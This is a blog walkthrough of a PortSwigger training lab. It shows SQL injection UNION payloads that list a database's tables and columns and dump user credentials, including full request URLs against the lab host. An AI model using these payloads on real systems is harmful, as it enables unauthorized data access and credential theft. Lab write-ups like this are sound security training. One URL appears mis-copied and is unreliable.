📕
Blog
  • 🐞Vulnerabilities & Techniques
    • Web Vulnerabilities
      • Open Redirect
      • HTTP Parameter Pollution (HPP)
      • Host Header Injection (HHI)
      • XSS
      • HTML-Injection
      • clickjacking
      • S3
      • EXternal Xml Entity (XXE)
      • XSS prevention | CSP
      • DOM-XSS
      • SQL Injection | SQLI
      • Response Manipulation Technique & How Burp Suite Works
    • API Vulnerabilities
      • Mass Assignment Vulnerability
  • 🚩CTF
    • ASCWG
  • ✍️Writeups
    • Read Writeups
      • REST API WriteUps
      • Web Vulnerabilities WriteUps
    • Technical Writeups
      • Reset Password Poisoning Via Host Header Injection Lead to (ATO)
      • OTP/2FA Bypasses
        • OTP bypasses
  • 😈TryHackMe
    • THM Advent of Cyber 3 (2021) NoSQL WriteUp
  • 🔱Web-CyberTalents
    • CyberTalents-Web-Easy
    • CyberTalents-Web-Medium
    • CyberTalents-Web-Hard
  • 🖇️Pentesting & Bug Hunting Tips
    • ATO Via Host Header Injection
    • OTP Bypass
    • OutLook Plugin Pentest Guide
  • 💻Port-Swigger Labs
    • XML external entity (XXE) injection
    • DOM-XSS
      • DOM XSS in the document.write sink using source location.search
      • Lab: DOM XSS in document.write sink using source location.search inside a select element
      • Lab: DOM XSS in innerHTML sink using source location.search
      • Lab: DOM XSS in jQuery anchor href attribute sink using location.search source
      • Lab: Reflected DOM XSS
      • Lab: Stored DOM XSS
    • SQL injection
      • Lab: SQL injection vulnerability in WHERE clause allowing retrieval of hidden data
      • Lab: SQL injection vulnerability allowing login bypass
      • Lab: SQL injection UNION attack, determining the number of columns returned by the query
      • Lab: SQL injection UNION attack, finding a column containing text
      • Lab: SQL injection UNION attack, retrieving data from other tables
      • Lab: SQL injection UNION attack, retrieving multiple values in a single column
      • Lab: SQL injection attack, querying the database type and version on Oracle
      • Lab: SQL injection attack, querying the database type and version on MySQL and Microsoft
      • Lab: SQL injection attack, listing the database contents on non-Oracle databases
  • 🛜Wireless Networks Penetration Testing
  • ⚔️Wi-Fi Attacks
    • 🕸️Network Scanning attack
    • 🌊DOS / Flooding
      • 1️⃣DoS - Frame Flooding (Deauth, EAPOL, Beacons)
      • 2️⃣DoS- Exploiting Countermeasures (MIC failure)
    • Jamming Attacks (هجمات التشويش)
    • Probe Requests Attack
    • Handshake Attacks
      • Dictionary Attack
      • Clientless Attack
      • KRACK Attack
      • Downgrad Attack
    • Rouge AP Attack
  • Lab Notes
  • RFID and NFC
  • Bluetooth
  • ZigBee
  • Google Map Test
Powered by GitBook
On this page
  • SQL injection attack, listing the database contents on non-Oracle databases
  • GET the NO of columns and Data types
  • Get All Tables
  • Get All Columns from the users_uenqft table
  • Get username_audqir and password_qddmam from users_uenqft table
  1. Port-Swigger Labs
  2. SQL injection

Lab: SQL injection attack, listing the database contents on non-Oracle databases

PreviousLab: SQL injection attack, querying the database type and version on MySQL and MicrosoftNextWireless Networks Penetration Testing

Last updated 1 year ago

  1. Use Burp Suite to intercept and modify the request that sets the product category filter.

  2. Determine the and . Verify that the query is returning two columns, both of which contain text, using a payload like the following in the category parameter: '+UNION+SELECT+'abc','def'--.

  3. Use the following payload to retrieve the list of tables in the database: '+UNION+SELECT+table_name,+NULL+FROM+information_schema.tables--

  4. Find the name of the table containing user credentials.

  5. Use the following payload (replacing the table name) to retrieve the details of the columns in the table: '+UNION+SELECT+column_name,+NULL+FROM+information_schema.columns+WHERE+table_name='users_abcdef'--

  6. Find the names of the columns containing usernames and passwords.

  7. Use the following payload (replacing the table and column names) to retrieve the usernames and passwords for all users: '+UNION+SELECT+username_abcdef,+password_abcdef+FROM+users_abcdef--

  8. Find the password for the administrator user, and use it to log in.

GET the NO of columns and Data types

'+UNION+SELECT+'abc','def'--.

Get All Tables

'+UNION+SELECT+table_name,+NULL+FROM+information_schema.tables--

Get All Columns from the users_uenqft table


https://acbf1f521ead714ac01047a1006000c1.web-security-academy.net/filter?category=Pets'+UNION+SELECT+username_audqir,+password_qddmam
+FROM+information_schema.columns+WHERE+table_name=%27users_uenqft%27--

Get username_audqir and password_qddmam from users_uenqft table


https://acbf1f521ead714ac01047a1006000c1.web-security-academy.net/filter?category=Pets'+UNION+SELECT+username_audqir,+password_qddmam+FROM+users_uenqft--

💻
SQL injection attack, listing the database contents on non-Oracle databases
number of columns that are being returned by the query
which columns contain text data